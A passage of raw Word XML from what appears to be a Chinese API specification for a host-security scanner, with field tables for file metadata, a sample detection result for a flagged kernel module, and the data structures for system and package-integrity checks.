          <w:p w14:paraId="34394DE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1901E3BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35731445" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADD7AAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB80FFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594A789C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CD4A9A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788ADF83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02ADAF96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C35BEDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E83F64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E5DAFF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757D730F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B40F44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBA979E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3757622A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DC97B8D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B344DE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009C7E98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EB13622" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F767093" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75959E98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F22D46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "malicious_name":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmci.ko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"798bea1cc8a7241df97abb1b4e85ab94b98e4a3a100757498008bf24fd831c8b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"f8bc6aa9a6409c67881c250057adc44e3246a52e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_name":"/lib/modules/2.6.32-754.3.5.el6.x86_64/misc/vmci.ko",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1536084007,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "file_md5":"2cc8051c7d9d2bc0ed5e3546f8701e47",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_permission":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-r--r--",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1535886506,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1535886506,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_owner":"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":131432,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_group":"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF9A3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc115166310"/>
      <w:bookmarkStart w:id="476" w:name="检查功能计划任务检查--网络状态检查用户状态检查系统文件状态检查进程状态检查"/>
      <w:bookmarkEnd w:id="470"/>
      <w:bookmarkEnd w:id="474"/>
      <w:r>
        <w:t>检查功能：计划任务检查 \ 网络状态检查\用户状态检查系统文件状态检查\进程状态检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="018CFEC4"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1380"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="43001FC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9164833" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06DC7957" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5327AF0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3473368A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C07FAF0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76CEFDDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DEDDD73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295580C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503A6A2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查的命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6570C7A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0932CB0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA4103A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0F79DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C298E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被几种检查方式检查出问题</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="770A99D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A86DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>match_rules</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028CB952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BAE2B12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B738CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>匹配的规则，是字符串模式的结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A2B5970" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBC9BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>local_more</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAB571E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A39D578" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57BF1F94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行命令的diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31AB99FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C131460" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>local_less</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130175ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A15D0C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F7274D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行命令的diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AF4DCA0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3EDFF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A22DFE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F433E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5176F07D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>包完整性结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EC0D192" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pkg数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2087"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CD4CBE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634BA03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FD0D530" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="398F72F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3985F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="735D6696" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9EB309" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_full_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75472593" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45797947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602E82D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>完整包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50784BA1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61358073" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8DB4A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4357AA88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1535EAAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>简单包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="257FAD0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31FA5175" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>package_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B13B38B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DDBC49E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2312DB9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>包版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EE466D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E1E2968" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56274D47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
